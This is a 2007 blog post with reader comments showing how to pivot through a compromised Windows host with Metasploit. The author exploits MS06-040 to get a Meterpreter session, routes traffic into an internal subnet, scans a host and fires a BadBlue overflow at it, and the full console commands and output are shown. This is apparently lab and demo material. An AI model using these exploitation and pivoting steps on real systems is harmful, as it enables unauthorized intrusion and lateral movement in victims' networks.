Thursday, September 6, 2007

Using Metasploit to pivot through a exploited host


so I'm working on chicagon slides and looking for a fun demo, Dean and I were talking about being able to pivot or relay through the victim into the internal network. i said i didnt think you could do it (he said you can)...the answer... you can. yeah i lost the bet :-)

http://www.metasploit.com/archive/framework/msg02580.html


so lets see it...

bust your shell and get your meterpreter session:

cg@segfault:~/evil/msf3$ ./msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #


=[ msf v3.1-dev
+ -- --=[ 217 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.170.129
RHOST => 192.168.170.129
msf exploit(ms06_040_netapi) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_040_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.170.129[\SRVSVC] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.170.129[\SRVSVC] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.170.1:44656 -> 192.168.170.129:4444)


run the route command to see what networks the victim can hit, you can also run ipconfig to see if the box is dual nic'ed

meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 172.16.0.1
127.0.0.0 255.0.0.0 127.0.0.1
172.16.0.0 255.255.0.0 172.16.0.1
172.16.0.1 255.255.255.255 127.0.0.1
172.16.255.255 255.255.255.255 172.16.0.1
192.168.170.0 255.255.255.0 192.168.170.129
192.168.170.129 255.255.255.255 127.0.0.1
192.168.170.255 255.255.255.255 192.168.170.129
224.0.0.0 240.0.0.0 172.16.0.1
224.0.0.0 240.0.0.0 192.168.170.129
255.255.255.255 255.255.255.255 172.16.0.1
255.255.255.255 255.255.255.255 192.168.170.129

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0


AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:c4
IP Address : 172.16.0.1
Netmask : 255.255.0.0


AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:ba
IP Address : 192.168.170.129
Netmask : 255.255.255.0



OR the handy dandy script that comes with msf get_local_subnets

meterpreter > run get_local_subnets
Local subnet: 0.0.0.0/0.0.0.0
Local subnet: 172.16.0.0/255.255.0.0
Local subnet: 192.168.170.0/255.255.255.0



as you can see there is an internal network

the post by hdm says to ctrl+z out of your meterpreter session to background it then set up a route in the msfconsole session

meterpreter > **did a ctrl+z here
Background session 1? [y/N] y
msf exploit(ms06_040_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local.

msf exploit(ms06_040_netapi) > route print

msf exploit(ms06_040_netapi) > route add 172.16.0.0 255.255.0.0 1

msf exploit(ms06_040_netapi) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
172.16.0.0 255.255.0.0 Session 1

msf exploit(ms06_040_netapi) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.170.1:44656 -> 192.168.170.129:4444


ok so you can see that we should be routing traffic thru there. now i tried to ping the host (which is 172.16.0.100) in this case and that didnt work, i also couldnt get any of the scanner auxiliary modules to actually scan and find anything (on either network) which is a bummer.

but i did get the smb scanner auxillary module to work and give me back the correct answer, so i know its working and passing data.

msf exploit(ms06_040_netapi) > back
msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 172.16.0.100
RHOSTS => 172.16.0.100
msf auxiliary(version) > run
[*] 172.16.0.100 is running Windows 2000 Service Pack 0 - Service Pack 4
[*] Auxiliary module execution completed


i'm still playing with popping a shell on the internal net, thus far msf says its working but when it comes time to interact with the shell its just not happening

msf > use exploit/windows/http/badblue_ext_overflow
msf exploit(badblue_ext_overflow) > set RHOST 172.16.0.100
RHOST => 172.16.0.100
msf exploit(badblue_ext_overflow) > set RPORT 8080
RPORT => 8080
msf exploit(badblue_ext_overflow) > show targets

Exploit targets:

Id Name
-- ----
0 BadBlue 2.5 (Universal)

msf exploit(badblue_ext_overflow) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(badblue_ext_overflow) > exploit -z
[*] Started bind handler
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)
[*] Trying target BadBlue 2.5 (Universal)...
[*] Session 2 created in the background.

msf exploit(badblue_ext_overflow) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.170.1:45544 -> 192.168.170.129:4444
2 Command shell Local Pipe -> Remote Pipe

msf exploit(badblue_ext_overflow) > sessions -i 2
[*] Starting interaction with 2...



**and thats about all i get, tried it with a few different sploits same result :-(

the useradd payload does work though



if anyone has been here, let me know if there is a nifty little trick to make it happen.

-CG
CG

3 comments:

Pento said...

Nice article!
I wanted for learn route feature of Metasploit for a long time =)

Anonymous said...

Does the route feature work with commands outside the Metasploit Framework?

Well, I mean, can I use hping3 for example from my Bash to ping the internal net while having a route set via MSF?

CG said...

@anonymous

at the moment no, this is supposed to be available in metasploit pro when it comes out. i dont know if thats going to trickle down to the free version or not though.